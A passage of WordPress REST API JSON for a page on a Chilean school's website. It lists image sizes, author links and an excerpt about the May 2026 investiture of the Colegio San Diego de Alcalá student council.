2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-300x135.jpg",300,135,true],"large":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-1024x461.jpg",584,263,true],"1536x1536":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-1536x692.jpg",1536,692,true],"2048x2048":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n.jpg",1600,721,false],"post-thumbnail":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-150x150.jpg",150,150,true],"innovationlite-fpage-thumb":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-1100x600.jpg",1100,600,true],"psacp-medium":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n.jpg",500,225,false]},"rttpg_author":{"display_name":"admi","author_link":"https:\/\/csandiego.cl\/2020\/author\/admi\/"},"rttpg_comment":0,"rttpg_category":null,"rttpg_excerpt":"CENTRO DE ESTUDIANTES 2026 Hu\u00e9pil, 6 de mayo de 2026. En una significativa y sencilla ceremonia realizada este mi\u00e9rcoles, se llev\u00f3 a cabo la investidura oficial del Centro de Estudiantes 2026 del Colegio San Diego de Alcal\u00e1. El hito principal de la jornada fue la firma del libro de actasRead More","_links":{"self":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/378","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/comments?post=378"}],"version-history":[{"count":17,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/378\/revisions"}],"predecessor-version":[{"id":7985,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/378\/revisions\/7985"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/media\/7626"}],"wp:attachment":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/media?parent=378"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}